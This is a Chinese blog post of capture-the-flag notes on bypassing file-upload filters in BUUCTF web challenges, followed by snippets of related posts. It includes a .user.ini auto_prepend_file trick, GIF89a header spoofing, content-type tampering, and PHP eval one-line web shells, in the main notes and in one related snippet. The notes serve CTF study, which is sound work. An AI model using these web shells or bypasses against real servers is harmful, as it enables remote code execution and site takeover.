BUUCTF 之 文件上传知识点总结

已于 2022-11-13 23:37:08 修改
阅读量561 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: web安全
于 2022-11-13 23:30:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49833809/article/details/127839598
版权

[MRCTF2020]你传xx呢(名字打不出来,会被封)

  1. 注意使用菜刀工具时写对链接,否则可能不会报错,只会显示返回空。
  2. 注意多种绕过方法混合使用,本题就是.htaccess上传时抓包改type为image/png。

[SUCTF 2019]CheckIn

  1. .user.ini解析漏洞:此文件为配置文件,其内容写:
    auto_prepend_file = 1.png
    auto_append_file = 1.png
    这时当文件夹下有.user.ini时,php文件执行时会在头尾分别文件包含1.png文件。(注意,如果把1.png文件改为其他php文件如1.php,仅能包含这一个文件,如若想多包含,只需要在1.php里写上其他包含文件即可。)
    这时候随意访问该文件夹下php文件,则会文件包含1.png里面的一句马。
  2. gif图文件头欺骗:GIF89a?
  3. 无问号php一句马:<script language=“php”>@eval($_REQUEST[8])</script>
  4. 注意一句马用菜刀工具时要用post或者request
网安菜13
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几...
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2176
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1028
Upload=> 文件上传漏洞。
文件上传典型题(buuctf)加深知识点
最新发布
Z11762的博客
04-19 749
89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 1004
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!
buuctf文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1451
文件上传漏洞笔记
BUUCTF Web upload
H18779083518的博客
05-10 327
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
Buuctf文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2176
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_...
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 382
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
Web-buuctf-Upload
weixin_52804141的博客
01-20 168
这里两种绕过方法,第一种在浏览器中把java scrabit脚本关了就可以了,第二种更改下后缀文件,改成允许上传的文件后缀就好了。这里改成在把文件后缀改位php,发现不行,就可以试试phtml(这两种后缀都不会被服务器视为php执行)总结,很简单的一道上传题,以前也练过很多,就当一道复习题来做了。上传成功,蚁剑连接就好了,在找到flag文件,获得flag。先上传一个一句话木马,发现存在前端绕过。
文件上传漏洞(buuctf极客大挑战easy upload)
qq_66013948的博客
09-26 257
这个语句被过滤了,只要出现了这个语句,就会被过滤,那么我们要试着绕过这个,当然,在绕过的途中可能会遇到其他的情况,例如遇到php被过滤之类的问题,不过这是有的题目才会出现的问题了,具体的题目要具体分析,有的题目过滤的关键词是不一样的,需要利用不同的语句进行绕过。一名网安工程师,最开始学的那几个漏洞之一学就是注入类漏洞,而注入的参数可以是get /post等参数,也可以是文件;首先,打开文件后,我们就可以看到一个上传图片的一个表单。那么,我们可以试着将这个文件变为phtml格式过后试着上传一下,得到的是。
buuctf-[WUSTCTF2020]CV Maker 文件上传漏洞
2202_75317918的博客
09-30 359
其他没有什么页面,只能更换头像上传文件,所以猜测是文件上传漏洞。添加文件头GIF89a。查看页面源代码,看到上传的php的文件。进入到了profile.php。
WEB-buuctf-你传你呢
weixin_52804141的博客
12-17 481
htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。网上查询资料发现这是属于文件解析漏洞,就是更改apache里.htaccess配置.可以将其它类型的文件转化为PHP的文件类型。1,一句话木马php后缀文件,phtml后缀文件,web服务器都会用php解释器解析。3.php对上传文件的检测。
BUUCTF:[GXYCTF2019]BabyUpload
fcz___的博客
03-23 132
到了这里,我们就得考虑一下用.user.ini文件还是用.htaccess文件。因为不知道目录中是否有php文件。所以用.htaccess文件。注意这里的a.jpg需要和你上传的一句话木马文件名相同。bp抓包看看能不能改后缀为php。来代替原来的一句话木马。再传一下一句话木马,看一下文件路径。我们传一个一句话木马。这个就是文件路径了。我们上传.htaccess文件。去bp抓包,改一下标签。
buuctf文件上传
03-10
buuctf文件上传中,通常需要注意以下几点: 1. 文件类型限制:buuctf平台通常会对上传的文件进行类型限制,只允许上传特定类型的文件,例如图片、文本等。这是为了防止上传恶意文件。 2. 文件大小限制:buuctf平台...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值